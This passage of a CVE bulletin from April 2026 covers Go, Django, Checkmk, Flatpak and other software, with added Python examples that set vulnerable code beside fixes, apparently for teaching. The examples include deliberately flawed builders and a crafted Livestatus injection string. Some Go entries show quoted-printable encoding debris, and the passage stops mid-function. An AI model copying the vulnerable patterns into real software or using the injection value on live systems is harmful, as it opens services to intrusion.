            3.3.7 git commit [ https://github.com/openssl/openssl/commit/b922e24e5b23ffb9cb9e14cadff23d91e9f7e406 ]
            3.0.20 git commit [ https://github.com/openssl/openssl/commit/eed200f58cd8645ed77e46b7e9f764e284df379e ]
    Sonatype -- Nexus Repository
        A vulnerability in the task management component of Sonatype Nexus Repository versions 3.22.1 through 3.90.2 allows an authenticated attacker with task creation permissions to execute arbitrary code, bypassing the nexus.scripts.allowCreation security control.
        Published: 2026-04-08 | CVSS: not yet calculated | CVE-2026-3199 [ https://www.cve.org/CVERecord?id=CVE-2026-3199 ]
        Source: https://help.sonatype.com/en/sonatype-nexus-repository-3-91-0-release-notes.html https://support.sonatype.com/hc/en-us/articles/50615414548499
    Erlang -- OTP
        Improper Certificate Validation vulnerability in Erlang OTP public_key (pubkey_ocsp module) allows OCSP designated-responder authorization bypass via missing signature verification. The OCSP response validation in public_key:pkix_ocsp_validate/5 does not verify that a CA-designated responder certificate was cryptographically signed by the issuing CA. Instead, it only checks that the responder certificate's issuer name matches the CA's subject name and that the certificate has the OCSPSigning extended key usage. An attacker who can intercept or control OCSP responses can create a self-signed certificate with a matching issuer name and the OCSPSigning EKU, and use it to forge OCSP responses that mark revoked certificates as valid. This affects SSL/TLS clients using OCSP stapling, which may accept connections to servers with revoked certificates, potentially transmitting sensitive data to compromised servers. Applications using the public_key:pkix_ocsp_validate/5 API directly are also affected, with impact depending on usage context. This vulnerability is associated with program files lib/public_key/src/pubkey_ocsp.erl and program routines pubkey_ocsp:is_authorized_responder/3. This issue affects OTP from OTP 27.0 until OTP 28.4.2 and 27.3.4.10, corresponding to public_key from 1.16 until 1.20.3 and 1.17.1.2, and ssl from 11.2 until 11.5.4 and 11.2.12.7.
        Published: 2026-04-07 | CVSS: not yet calculated | CVE-2026-32144 [ https://www.cve.org/CVERecord?id=CVE-2026-32144 ]
        Source: https://github.com/erlang/otp/security/advisories/GHSA-gxrm-pf64-99xm https://cna.erlef.org/cves/CVE-2026-32144.html https://osv.dev/vulnerability/EEF-CVE-2026-32144 https://www.erlang.org/doc/system/versions.html#order-of-versions https://github.com/erlang/otp/commit/ac7ff528be857c5d35eb29c7f24106e3a16d4891 https://github.com/erlang/otp/commit/49033a6d93a5be0ee0dce04e1fb8b4ae7de1e0c0
    Gleam -- Gleam
        Improper path validation vulnerability in the Gleam compiler's handling of git dependencies allows arbitrary file system modification during dependency download. Dependency names from gleam.toml and manifest.toml are incorporated into filesystem paths without sufficient validation or confinement to the intended dependency directory, allowing attacker-controlled paths (via relative traversal such as ../ or absolute paths) to target filesystem locations outside that directory. When resolving git dependencies (e.g. via gleam deps download), the computed path is used for filesystem operations including directory deletion and creation. This vulnerability occurs during the dependency resolution and download phase, which is generally expected to be limited to fetching and preparing dependencies within a confined directory. A malicious direct or transitive git dependency can exploit this issue to delete and overwrite arbitrary directories outside the intended dependency directory, including attacker-chosen absolute paths, potentially causing data loss. In some environments, this may be further leveraged to achieve code execution, for example by overwriting git hooks or shell configuration files. This issue affects Gleam from 1.9.0-rc1 until 1.15.3 and 1.16.0-rc1.
        Published: 2026-04-11 | CVSS: not yet calculated | CVE-2026-32146 [ https://www.cve.org/CVERecord?id=CVE-2026-32146 ]
        Source: https://github.com/gleam-lang/gleam/security/advisories/GHSA-vq5j-55vx-wq8j https://cna.erlef.org/cves/CVE-2026-32146.html https://osv.dev/vulnerability/EEF-CVE-2026-32146 https://github.com/gleam-lang/gleam/commit/1aa5d8e594b0aa240bb213fce6ee19c65e6d5bcf https://github.com/gleam-lang/gleam/commit/55bb36e6d7febfbbc48c4d001e0ae13eb0312d78
    Go standard library -- crypto/x509
        During chain building, the amount of work that is done is not correctly limited when a large number of intermediate certificates are passed in VerifyOptions.Intermediates, which can lead to a denial of service. This affects both direct users of crypto/x509 and users of crypto/tls.
        Published: 2026-04-08 | CVSS: not yet calculated | CVE-2026-32280 [ https://www.cve.org/CVERecord?id=CVE-2026-32280 ]
        Source: https://go.dev/cl/758320 https://go.dev/issue/78282 https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU https://pkg.go.dev/vuln/GO-2026-4947
    =C2=A0 Go standard library--crypto/x509 Validating certificate chains which=
    use policies is unexpectedly inefficient when certificates in the chain co= ntain a very large number of policy mappings, possibly causing denial of se= rvice. This only affects validation of otherwise trusted certificate chains=
    , issued by a root CA in the VerifyOptions.Roots CertPool, or in the system=
    certificate pool. 2026-04-08 not yet calculated CVE-2026-32281 [ https://w= ww.cve.org/CVERecord?id=3DCVE-2026-32281 ] https://go.dev/cl/758061 https://go.dev/issue/78281 https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU https://pkg.go.dev/vuln/GO-2026-4946
    =C2=A0 Go standard library--internal/syscall/unix On Linux, if the target o=
    f Root.Chmod is replaced with a symlink while the chmod operation is in pro= gress, Chmod can operate on the target of the symlink, even when the target=
    lies outside the root. The Linux fchmodat syscall silently ignores the AT_= SYMLINK_NOFOLLOW flag, which Root.Chmod uses to avoid symlink traversal. Ro= ot.Chmod checks its target before acting and returns an error if the target=
    is a symlink lying outside the root, so the impact is limited to cases whe=
    re the target is replaced with a symlink between the check and operation. 2= 026-04-08 not yet calculated CVE-2026-32282 [ https://www.cve.org/CVERecord= ?id=3DCVE-2026-32282 ] https://go.dev/cl/763761
    https://go.dev/issue/78293 https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU https://pkg.go.dev/vuln/GO-2026-4864
    =C2=A0 Go standard library--crypto/tls If one side of the TLS connection se= nds multiple key update messages post-handshake in a single record, the con= nection can deadlock, causing uncontrolled consumption of resources. This c=
    an lead to a denial of service. This only affects TLS 1.3. 2026-04-08 not y=
    et calculated CVE-2026-32283 [ https://www.cve.org/CVERecord?id=3DCVE-2026-= 32283 ] https://go.dev/cl/763767
    https://go.dev/issue/78334 https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU https://pkg.go.dev/vuln/GO-2026-4870
    =C2=A0 Go standard library--archive/tar tar.Reader can allocate an unbounde=
    d amount of memory when reading a maliciously-crafted archive containing a = large number of sparse regions encoded in the "old GNU sparse map" format. = 2026-04-08 not yet calculated CVE-2026-32288 [ https://www.cve.org/CVERecor= d?id=3DCVE-2026-32288 ] https://go.dev/cl/763766
    https://go.dev/issue/78301 https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU https://pkg.go.dev/vuln/GO-2026-4869
    =C2=A0 Go standard library--html/template Context was not properly tracked = across template branches for JS template literals, leading to possibly inco= rrect escaping of content when branches were used. Additionally template ac= tions within JS template literals did not properly track the brace depth, l= eading to incorrect escaping being applied. These issues could cause action=
    s within JS template literals to be incorrectly or improperly escaped, lead= ing to XSS vulnerabilities. 2026-04-08 not yet calculated CVE-2026-32289 [ = https://www.cve.org/CVERecord?id=3DCVE-2026-32289 ] https://go.dev/cl/763762 https://go.dev/issue/78331 https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU https://pkg.go.dev/vuln/GO-2026-4865
Apache Software Foundation--Apache Cassandra
Authenticated DoS over CQL in Apache Cassandra 4.0, 4.1, 5.0 allows an authenticated user to raise query latencies via repeated password changes. Users are recommended to upgrade to version 4.0.20, 4.1.11, 5.0.7, which fixes this issue.
Published: 2026-04-07 | CVSS: not yet calculated | CVE-2026-32588 [ https://www.cve.org/CVERecord?id=CVE-2026-32588 ]
https://lists.apache.org/thread/2tnwjdnss378glxrsmnlzz3k53ftphrc

Apache Software Foundation--Apache Tomcat
Improper Input Validation vulnerability in Apache Tomcat due to an incomplete fix of CVE-2025-66614. This issue affects Apache Tomcat: from 11.0.15 through 11.0.19, from 10.1.50 through 10.1.52, from 9.0.113 through 9.0.115. Users are recommended to upgrade to version 11.0.20, 10.1.53 or 9.0.116, which fix the issue.
Published: 2026-04-09 | CVSS: not yet calculated | CVE-2026-32990 [ https://www.cve.org/CVERecord?id=CVE-2026-32990 ]
https://lists.apache.org/thread/1nl9zqft0ksqlhlkd3j4obyjz1ghoyn7

Apache Software Foundation--Apache OpenMeetings
Improper Handling of Insufficient Privileges vulnerability in Apache OpenMeetings. Any registered user can query the web service with their credentials and get the files/sub-folders of any folder by ID (metadata only, NOT contents). Metadata includes id, type, name and some other fields; the full list of fields can be checked in the FileItemDTO object. This issue affects Apache OpenMeetings: from 3.10 before 9.0.0. Users are recommended to upgrade to version 9.0.0, which fixes the issue.
Published: 2026-04-09 | CVSS: not yet calculated | CVE-2026-33005 [ https://www.cve.org/CVERecord?id=CVE-2026-33005 ]
https://openmeetings.apache.org/openmeetings-db/apidocs/org.apache.openmeetings.db/org/apache/openmeetings/db/dto/file/FileItemDTO.html
https://lists.apache.org/thread/pttoprd628g3xr6lpp3bm1z8m3z8t4p7

djangoproject--Django
An issue was discovered in 6.0 before 6.0.4, 5.2 before 5.2.13, and 4.2 before 4.2.30. `MultiPartParser` allows remote attackers to degrade performance by submitting multipart uploads with `Content-Transfer-Encoding: base64` including excessive whitespace. Earlier, unsupported Django series (such as 5.0.x, 4.1.x, and 3.2.x) were not evaluated and may also be affected. Django would like to thank Seokchan Yoon for reporting this issue.
Published: 2026-04-07 | CVSS: not yet calculated | CVE-2026-33033 [ https://www.cve.org/CVERecord?id=CVE-2026-33033 ]
Django security archive [ https://docs.djangoproject.com/en/dev/releases/security/ ]
Django releases announcements [ https://groups.google.com/g/django-announce ]
Django security releases issued: 6.0.4, 5.2.13, and 4.2.30 [ https://www.djangoproject.com/weblog/2026/apr/07/security-releases/ ]

djangoproject--Django
An issue was discovered in 6.0 before 6.0.4, 5.2 before 5.2.13, and 4.2 before 4.2.30. ASGI requests with a missing or understated `Content-Length` header could bypass the `DATA_UPLOAD_MAX_MEMORY_SIZE` limit when reading `HttpRequest.body`, allowing remote attackers to load an unbounded request body into memory. Earlier, unsupported Django series (such as 5.0.x, 4.1.x, and 3.2.x) were not evaluated and may also be affected. Django would like to thank Superior for reporting this issue.
Published: 2026-04-07 | CVSS: not yet calculated | CVE-2026-33034 [ https://www.cve.org/CVERecord?id=CVE-2026-33034 ]
Django security archive [ https://docs.djangoproject.com/en/dev/releases/security/ ]
Django releases announcements [ https://groups.google.com/g/django-announce ]
Django security releases issued: 6.0.4, 5.2.13, and 4.2.30 [ https://www.djangoproject.com/weblog/2026/apr/07/security-releases/ ]

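The failure mode in the ASGI entry above (CVE-2026-33034), as an added example in Python. This is not Django's code: it shows a body reader that sizes its trust on the declared Content-Length beside one that counts the bytes actually received. The limit constant, the fake ASGI receive() and the request with an understated Content-Length are all constructed for this example.

```python
import asyncio

# Assumed limit for this example; it plays the role of Django's
# DATA_UPLOAD_MAX_MEMORY_SIZE but is not Django's default value.
MAX_BODY_BYTES = 8192


class RequestDataTooBig(Exception):
    """Raised when a request body exceeds the configured limit."""


def declared_content_length(headers):
    """Return the integer Content-Length from ASGI-style (name, value) byte
    pairs, or None when the header is absent or not a number."""
    for name, value in headers:
        if name.lower() == b"content-length":
            try:
                return int(value)
            except ValueError:
                return None
    return None


async def read_body_trusting_header(receive, headers, limit=MAX_BODY_BYTES):
    """Vulnerable pattern: the limit is enforced against the declared size
    only.  A client that declares 10 bytes and streams far more passes the
    check and the whole stream is buffered in memory."""
    declared = declared_content_length(headers)
    if declared is not None and declared > limit:
        raise RequestDataTooBig(declared)
    chunks = []
    while True:
        message = await receive()
        chunks.append(message.get("body", b""))
        if not message.get("more_body", False):
            break
    return b"".join(chunks)


async def read_body_bounded(receive, headers, limit=MAX_BODY_BYTES):
    """Hardened pattern: keep the header check as an early reject, but also
    count every byte actually received and stop the moment the limit is
    exceeded, before the oversized chunk is retained."""
    declared = declared_content_length(headers)
    if declared is not None and declared > limit:
        raise RequestDataTooBig(declared)
    chunks, received = [], 0
    while True:
        message = await receive()
        chunk = message.get("body", b"")
        received += len(chunk)
        if received > limit:
            raise RequestDataTooBig(received)
        chunks.append(chunk)
        if not message.get("more_body", False):
            break
    return b"".join(chunks)


def make_receive(chunks):
    """Constructed ASGI receive() that hands out the given body chunks,
    setting more_body on all but the last."""
    chunks = list(chunks) or [b""]
    it = iter(chunks)
    remaining = len(chunks)

    async def receive():
        nonlocal remaining
        chunk = next(it)
        remaining -= 1
        return {"type": "http.request", "body": chunk, "more_body": remaining > 0}

    return receive


def run(coro):
    return asyncio.run(coro)


def demo():
    """Constructed request: Content-Length claims 10 bytes, the client then
    streams three 4096-byte chunks (12288 bytes) against an 8192-byte limit.
    Returns (bytes buffered by the trusting reader, bounded reader outcome)."""
    headers = [(b"content-type", b"application/octet-stream"),
               (b"content-length", b"10")]
    chunks = [b"A" * 4096] * 3
    trusting = run(read_body_trusting_header(make_receive(chunks), headers))
    try:
        run(read_body_bounded(make_receive(chunks), headers))
        bounded = "accepted"
    except RequestDataTooBig:
        bounded = "rejected"
    return len(trusting), bounded


if __name__ == "__main__":
    print(demo())
```

The point of counting in the loop rather than after it is that the oversized chunk is rejected before it is appended, so the server's memory never grows past limit plus one chunk regardless of what the client declared.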
Six Apart Ltd.--Movable Type
Movable Type provided by Six Apart Ltd. contains an SQL Injection vulnerability which may allow an attacker to execute an arbitrary SQL statement.
Published: 2026-04-08 | CVSS: not yet calculated | CVE-2026-33088 [ https://www.cve.org/CVERecord?id=CVE-2026-33088 ]
https://movabletype.org/news/2026/04/mt-907-released.html
https://www.sixapart.jp/movabletype/news/2026/04/08-1100.html
https://jvn.jp/en/jp/JVN66473735/

Acronis--Acronis True Image OEM
Local privilege escalation due to improper handling of environment variables. The following products are affected: Acronis True Image OEM (macOS) before build 42571, Acronis True Image (macOS) before build 42902.
Published: 2026-04-10 | CVSS: not yet calculated | CVE-2026-33092 [ https://www.cve.org/CVERecord?id=CVE-2026-33092 ]
SEC-9407 [ https://security-advisory.acronis.com/advisories/SEC-9407 ]

Apache Software Foundation--Apache ActiveMQ Client
Improper validation and restriction of a classpath path name vulnerability in Apache ActiveMQ Client, Apache ActiveMQ Broker, Apache ActiveMQ All, Apache ActiveMQ Web, Apache ActiveMQ. In two instances (when creating a Stomp consumer and also browsing messages in the Web console) an authenticated user provided "key" value could be constructed to traverse the classpath due to path concatenation. As a result, the application is exposed to a classpath path resource loading vulnerability that could potentially be chained together with another attack to lead to exploit. This issue affects Apache ActiveMQ Client: before 5.19.3, from 6.0.0 before 6.2.2; Apache ActiveMQ Broker: before 5.19.3, from 6.0.0 before 6.2.2; Apache ActiveMQ All: before 5.19.3, from 6.0.0 before 6.2.2; Apache ActiveMQ Web: before 5.19.3, from 6.0.0 before 6.2.2; Apache ActiveMQ: before 5.19.3, from 6.0.0 before 6.2.2. Users are recommended to upgrade to version 5.19.4 or 6.2.3, which fixes the issue. Note: 5.19.3 and 6.2.2 also fix this issue, but that is limited to non-Windows environments due to a path separator resolution bug fixed in 5.19.4 and 6.2.3.
Published: 2026-04-07 | CVSS: not yet calculated | CVE-2026-33227 [ https://www.cve.org/CVERecord?id=CVE-2026-33227 ]
https://activemq.apache.org/security-advisories.data/CVE-2026-33227-announcement.txt

xwiki--xwiki-platform
XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Prior to 17.4.8 and 17.10.1, an improperly protected scripting API allows any user with script right to bypass the sandboxing of the Velocity scripting API and execute, e.g., arbitrary Python scripts, allowing full access to the XWiki instance and thereby compromising the confidentiality, integrity and availability of the whole instance. Note that script right already constitutes a high level of access that we don't recommend giving to untrusted users. This vulnerability is fixed in 17.4.8 and 17.10.1.
Published: 2026-04-08 | CVSS: not yet calculated | CVE-2026-33229 [ https://www.cve.org/CVERecord?id=CVE-2026-33229 ]
https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-h259-74h5-4rh9
https://github.com/xwiki/xwiki-platform/commit/9fe84da66184c05953df9466cf3a4acd15a46e63
https://jira.xwiki.org/browse/XWIKI-23698
https://jira.xwiki.org/browse/XWIKI-23702

Apache Software Foundation--Apache OpenMeetings
Use of Hard-coded Cryptographic Key vulnerability in Apache OpenMeetings. The remember-me cookie encryption key is set to a default value in openmeetings.properties and is not auto-rotated. In case the OM admin hasn't changed the default encryption key, an attacker who has stolen a cookie from a logged-in user can get full user credentials. This issue affects Apache OpenMeetings: from 6.1.0 before 9.0.0. Users are recommended to upgrade to version 9.0.0, which fixes the issue.
Published: 2026-04-09 | CVSS: not yet calculated | CVE-2026-33266 [ https://www.cve.org/CVERecord?id=CVE-2026-33266 ]
https://lists.apache.org/thread/b05jnp9563v49zq494lox9kjbhhf2w66

ICZ Corporation--MATCHA INVOICE
Unrestricted upload of file with dangerous type issue exists in MATCHA INVOICE 2.6.6 and earlier. If this vulnerability is exploited, an arbitrary file may be created by an administrator of the product. As a result, arbitrary code may be executed on the server.
Published: 2026-04-08 | CVSS: not yet calculated | CVE-2026-33273 [ https://www.cve.org/CVERecord?id=CVE-2026-33273 ]
https://oss.icz.co.jp/news/?p=1386
https://jvn.jp/en/jp/JVN33581068/

OpenIdentityPlatform--OpenAM
Open Access Management (OpenAM) is an access management solution. Prior to 16.0.6, OpenIdentityPlatform OpenAM is vulnerable to pre-authentication Remote Code Execution (RCE) via unsafe Java deserialization of the jato.clientSession HTTP parameter. This bypasses the WhitelistObjectInputStream mitigation that was applied to the jato.pageSession parameter after CVE-2021-35464. An unauthenticated attacker can achieve arbitrary command execution on the server by sending a crafted serialized Java object as the jato.clientSession GET/POST parameter to any JATO ViewBean endpoint whose JSP contains <jato:form> tags (e.g., the Password Reset pages). This vulnerability is fixed in 16.0.6.
Published: 2026-04-07 | CVSS: not yet calculated | CVE-2026-33439 [ https://www.cve.org/CVERecord?id=CVE-2026-33439 ]
https://github.com/OpenIdentityPlatform/OpenAM/security/advisories/GHSA-2cqq-rpvq-g5qj

Checkmk GmbH--Checkmk
Livestatus injection in the monitoring quicksearch in Checkmk <2.5.0b4 allows an authenticated attacker to inject Livestatus commands via the search query due to insufficient input sanitization in search filter plugins.
Published: 2026-04-10 | CVSS: not yet calculated | CVE-2026-33455 [ https://www.cve.org/CVERecord?id=CVE-2026-33455 ]
https://checkmk.com/werk/17988

Checkmk GmbH--Checkmk
Livestatus injection in the notification test mode in Checkmk <2.5.0b4 and <2.4.0p26 allows an authenticated user with access to the notification test page to inject arbitrary Livestatus commands via a crafted service description.
Published: 2026-04-10 | CVSS: not yet calculated | CVE-2026-33456 [ https://www.cve.org/CVERecord?id=CVE-2026-33456 ]
https://checkmk.com/werk/17989

Checkmk GmbH--Checkmk
Livestatus injection in the prediction graph page in Checkmk <2.5.0b4, <2.4.0p26, and <2.3.0p47 allows an authenticated user to inject arbitrary Livestatus commands via a crafted service name parameter due to insufficient sanitization of the service description value.
Published: 2026-04-10 | CVSS: not yet calculated | CVE-2026-33457 [ https://www.cve.org/CVERecord?id=CVE-2026-33457 ]
https://checkmk.com/werk/17990

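The three Checkmk entries above (CVE-2026-33455, CVE-2026-33456, CVE-2026-33457) are one bug class, so a single added example in Python covers them. It is not Checkmk's code. It shows a Livestatus query built by string concatenation beside one that refuses any user value that could start a new header line. The protocol facts relied on are that a Livestatus query is one "Name: value" header per line, ended by a blank line; that the protocol offers no escape for a newline inside a value is an assumption made here, which is why the example rejects rather than escapes. The hostile service description is constructed.

```python
import re

# A Livestatus header line: keyword, colon, space, value.
_HEADER_LINE = re.compile(r"^[A-Za-z]+: ")

# Control characters (CR and LF included) have no place in a host or
# service name, and a newline would terminate the current header.
_FORBIDDEN = re.compile(r"[\x00-\x1f\x7f]")

_IDENTIFIER = re.compile(r"[a-z_]+")


class LivestatusInjection(ValueError):
    """Raised when a user-supplied value would add or alter a header."""


def naive_query(table, column, value):
    """The vulnerable pattern: the value is pasted straight into the query."""
    return f"GET {table}\nFilter: {column} = {value}\n\n"


def is_safe_value(value):
    """True if the value cannot break out of its header line."""
    return _FORBIDDEN.search(value) is None


def safe_query(table, column, value, columns=()):
    """Build a query whose user-supplied part stays inside one header value.
    Table and column names come from code, so they are checked against an
    identifier pattern rather than escaped."""
    if not (_IDENTIFIER.fullmatch(table) and _IDENTIFIER.fullmatch(column)):
        raise ValueError("table and column must be lowercase identifiers")
    if not is_safe_value(value):
        raise LivestatusInjection(f"control character in value: {value!r}")
    lines = [f"GET {table}"]
    if columns:
        lines.append("Columns: " + " ".join(columns))
    lines.append(f"Filter: {column} = {value}")
    return "\n".join(lines) + "\n\n"


def headers_of(query):
    """The header lines a Livestatus server would act on for this query."""
    return [line for line in query.split("\n") if _HEADER_LINE.match(line)]


def injected_headers(user_value):
    """Diagnostic: headers the naive builder emits for a value beyond the
    single Filter the caller intended.  Empty for benign input."""
    return headers_of(naive_query("services", "description", user_value))[1:]


if __name__ == "__main__":
    # Constructed attacker input: a service description carrying a second
    # Filter and an Or header, widening the result to every host's services.
    hostile = "CPU load\nFilter: host_name ~ .*\nOr: 2"
    print(injected_headers(hostile))
    print(is_safe_value(hostile), is_safe_value("CPU load"))
    print(safe_query("services", "description", "CPU load", columns=("host_name", "state")))
```

The same check belongs at every point where a description, host name or search term from a request is turned into a header value; the three werks differ only in which page forgot it.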
chamilo--chamilo-lms
Chamilo LMS is a learning management system. Prior to 1.11.38, a chained attack can enable otherwise-blocked PHP code from the main/install/ directory and allow an unauthenticated attacker to modify existing files or create new files where allowed by system permissions. This only affects portals with the main/install/ directory still present and read-accessible. This vulnerability is fixed in 1.11.38.
Published: 2026-04-10 | CVSS: not yet calculated | CVE-2026-33698 [ https://www.cve.org/CVERecord?id=CVE-2026-33698 ]
https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-557g-2w66-gpmf
https://github.com/chamilo/chamilo-lms/commit/d3355d7873c7e5b907c5fa84cbd5d9b62ed33e51

chamilo--chamilo-lms
Chamilo LMS is a learning management system. Prior to 2.0.0-RC.3, an Insecure Direct Object Reference (IDOR) vulnerability in the /social-network/personal-data/{userId} endpoint allows any authenticated user to access full personal data and API tokens of arbitrary users by modifying the userId parameter. This results in mass disclosure of sensitive user information and credentials, enabling a full platform data breach. This vulnerability is fixed in 2.0.0-RC.3.
Published: 2026-04-10 | CVSS: not yet calculated | CVE-2026-33703 [ https://www.cve.org/CVERecord?id=CVE-2026-33703 ]
https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-27x6-c5c7-gpf5

Go standard library--crypto/x509
When verifying a certificate chain containing excluded DNS constraints, these constraints are not correctly applied to wildcard DNS SANs which use a different case than the constraint. This only affects validation of otherwise trusted certificate chains, issued by a root CA in the VerifyOptions.Roots CertPool, or in the system certificate pool.
Published: 2026-04-08 | CVSS: not yet calculated | CVE-2026-33810 [ https://www.cve.org/CVERecord?id=CVE-2026-33810 ]
https://go.dev/cl/763763
https://go.dev/issue/78332
https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU
https://pkg.go.dev/vuln/GO-2026-4866

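Why the excluded-constraint check in the entry above (CVE-2026-33810) has to fold case, as an added example in Python. This is not Go's crypto/x509 code: it is a simplified RFC 5280 section 4.2.1.10 DNS name-constraint matcher that lower-cases labels before comparing them and treats a wildcard SAN like any other name, shown beside the exact-case comparison that lets "*.EXAMPLE.COM" slip past an "example.com" exclusion. The SAN lists and constraints are constructed; the leading-dot "subdomains only" reading of a constraint is a convention some implementations apply, not an RFC requirement for DNS constraints.

```python
def _labels(name):
    """Split a DNS name into lower-cased labels, right to left.  A trailing
    dot (absolute name) is tolerated."""
    name = name.rstrip(".")
    if not name:
        return []
    return [label.lower() for label in reversed(name.split("."))]


def dns_matches_constraint(name, constraint):
    """True if `name` (possibly a wildcard SAN such as *.Example.COM) falls
    under `constraint`.  An empty constraint matches everything; a
    constraint starting with "." requires at least one extra label."""
    if constraint == "":
        return True
    must_have_subdomain = constraint.startswith(".")
    constraint_labels = _labels(constraint.lstrip("."))
    name_labels = _labels(name)
    if len(name_labels) < len(constraint_labels):
        return False
    if must_have_subdomain and len(name_labels) == len(constraint_labels):
        return False
    # Only as many labels as the constraint has are compared, right to
    # left, so a "*" label on the left of the name never decides the match.
    return all(n == c for n, c in zip(name_labels, constraint_labels))


def check_san_constraints(dns_sans, permitted=(), excluded=()):
    """Apply permitted/excluded DNS constraints to a list of SANs the way a
    chain builder must: every SAN has to match at least one permitted
    constraint (when any are given) and none of the excluded ones.
    Returns the SANs that violate the constraints."""
    bad = []
    for san in dns_sans:
        if any(dns_matches_constraint(san, ex) for ex in excluded):
            bad.append(san)
            continue
        if permitted and not any(dns_matches_constraint(san, p) for p in permitted):
            bad.append(san)
    return bad


def naive_case_sensitive_match(name, constraint):
    """The comparison that produces the bug class: a byte-exact suffix
    check.  Kept only to show what the case fold buys."""
    return name == constraint or name.endswith("." + constraint.lstrip("."))


if __name__ == "__main__":
    # Constructed leaf: issued under a CA that excludes example.com.
    sans = ["*.EXAMPLE.COM", "api.example.org"]
    print(check_san_constraints(sans, excluded=["example.com"]))
    print(naive_case_sensitive_match("*.EXAMPLE.COM", "example.com"))
```

The practical check after a fix like Go's is to keep a test vector in which the SAN and the constraint differ only in case, for both the wildcard and the plain form, and to assert the chain is rejected in both.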
github.com/jackc/pgx/v5--github.com/jackc/pgx/v5/pgproto3
Memory-safety vulnerability in github.com/jackc/pgx/v5.
Published: 2026-04-07 | CVSS: not yet calculated | CVE-2026-33815 [ https://www.cve.org/CVERecord?id=CVE-2026-33815 ]
https://pkg.go.dev/vuln/GO-2026-4771

github.com/jackc/pgx/v5--github.com/jackc/pgx/v5/pgproto3
Memory-safety vulnerability in github.com/jackc/pgx/v5.
Published: 2026-04-07 | CVSS: not yet calculated | CVE-2026-33816 [ https://www.cve.org/CVERecord?id=CVE-2026-33816 ]
https://pkg.go.dev/vuln/GO-2026-4772

Mlflow--Mlflow
MLflow is vulnerable to Stored Cross-Site Scripting (XSS) caused by unsafe parsing of YAML-based MLmodel artifacts in its web interface. An authenticated attacker can upload a malicious MLmodel file containing a payload that executes when another user views the artifact in the UI. This allows actions such as session hijacking or performing operations on behalf of the victim. This issue affects MLflow versions through 3.10.1.
Published: 2026-04-07 | CVSS: not yet calculated | CVE-2026-33865 [ https://www.cve.org/CVERecord?id=CVE-2026-33865 ]
https://github.com/mlflow/mlflow/pull/21435
https://cert.pl/en/posts/2026/04/CVE-2026-33865/
https://afine.com/blogs/attacking-mlflow-how-ml-artifacts-become-attack-vectors

Mlflow--Mlflow
MLflow is vulnerable to an authorization bypass affecting the AJAX endpoint used to download saved model artifacts. Due to missing access-control validation, a user without permissions to a given experiment can directly query this endpoint and retrieve model artifacts they are not authorized to access. This issue affects MLflow versions through 3.10.1.
Published: 2026-04-07 | CVSS: not yet calculated | CVE-2026-33866 [ https://www.cve.org/CVERecord?id=CVE-2026-33866 ]
https://github.com/mlflow/mlflow/pull/21708
https://cert.pl/en/posts/2026/04/CVE-2026-33865/
https://afine.com/blogs/attacking-mlflow-how-ml-artifacts-become-attack-vectors

Apache Software Foundation--Apache OpenMeetings
Use of GET Request Method With Sensitive Query Strings vulnerability in Apache OpenMeetings. The REST login endpoint uses the HTTP GET method with username and password passed as query parameters. Please check the references regarding possible impact. This issue affects Apache OpenMeetings: from 3.1.3 before 9.0.0. Users are recommended to upgrade to version 9.0.0, which fixes the issue.
Published: 2026-04-09 | CVSS: not yet calculated | CVE-2026-34020 [ https://www.cve.org/CVERecord?id=CVE-2026-34020 ]
https://owasp.org/www-community/vulnerabilities/Information_exposure_through_query_strings_in_url
https://lists.apache.org/thread/2h3h9do5tp17xldr0nps1yjmkx4vs3db

flatpak--flatpak
Flatpak is a Linux application sandboxing and distribution framework. Prior to 1.16.4, the Flatpak portal accepts paths in the sandbox-expose options which can be app-controlled symlinks pointing at arbitrary paths. Flatpak run mounts the resolved host path in the sandbox. This gives apps access to all host files and can be used as a primitive to gain code execution in the host context. This vulnerability is fixed in 1.16.4.
Published: 2026-04-07 | CVSS: not yet calculated | CVE-2026-34078 [ https://www.cve.org/CVERecord?id=CVE-2026-34078 ]
https://github.com/flatpak/flatpak/security/advisories/GHSA-cc2q-qc34-jprg

flatpak--flatpak
Flatpak is a Linux application sandboxing and distribution framework. Prior to 1.16.4, the caching for ld.so removes outdated cache files without properly checking that the app-controlled path to the outdated cache is in the cache directory. This allows Flatpak apps to delete arbitrary files on the host. This vulnerability is fixed in 1.16.4.
Published: 2026-04-07 | CVSS: not yet calculated | CVE-2026-34079 [ https://www.cve.org/CVERecord?id=CVE-2026-34079 ]
https://github.com/flatpak/flatpak/security/advisories/GHSA-p29x-r292-46pp

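The Flatpak ld.so cache entry above (CVE-2026-34079) and the Gleam dependency-path entry earlier in this bulletin (CVE-2026-32146) share one root cause: a path derived from untrusted input is handed to a delete or create operation without first proving it lies inside the directory it was meant to stay in. One confinement check that serves both, as an added example in Python (not Gleam's or Flatpak's code): the path is resolved through realpath, so symlinks and ".." are collapsed, and the destructive operation runs only on a path shown to be under the base directory. The temporary directory layout and the hostile names are constructed for the demo.

```python
import os
import shutil
import tempfile


class PathEscape(ValueError):
    """Raised when an untrusted path would land outside its base directory."""


def confine(base, untrusted_relative):
    """Return the absolute, symlink-resolved path of `untrusted_relative`
    inside `base`, or raise PathEscape.

    The absolute-path and ".." rejections are explicit, cheap rules; the
    realpath/commonpath comparison is the actual boundary and is what also
    catches a symlink inside the tree that points out of it."""
    if os.path.isabs(untrusted_relative):
        raise PathEscape(f"absolute path not allowed: {untrusted_relative!r}")
    if ".." in untrusted_relative.replace("\\", "/").split("/"):
        raise PathEscape(f"parent traversal not allowed: {untrusted_relative!r}")
    base_real = os.path.realpath(base)
    target = os.path.realpath(os.path.join(base_real, untrusted_relative))
    try:
        inside = os.path.commonpath([base_real, target]) == base_real
    except ValueError:  # different drives on Windows: treat as an escape
        inside = False
    if not inside:
        raise PathEscape(f"{untrusted_relative!r} resolves to {target!r}, outside {base_real!r}")
    return target


def is_confined(base, untrusted_relative):
    try:
        confine(base, untrusted_relative)
        return True
    except PathEscape:
        return False


def remove_cached_entry(base, name):
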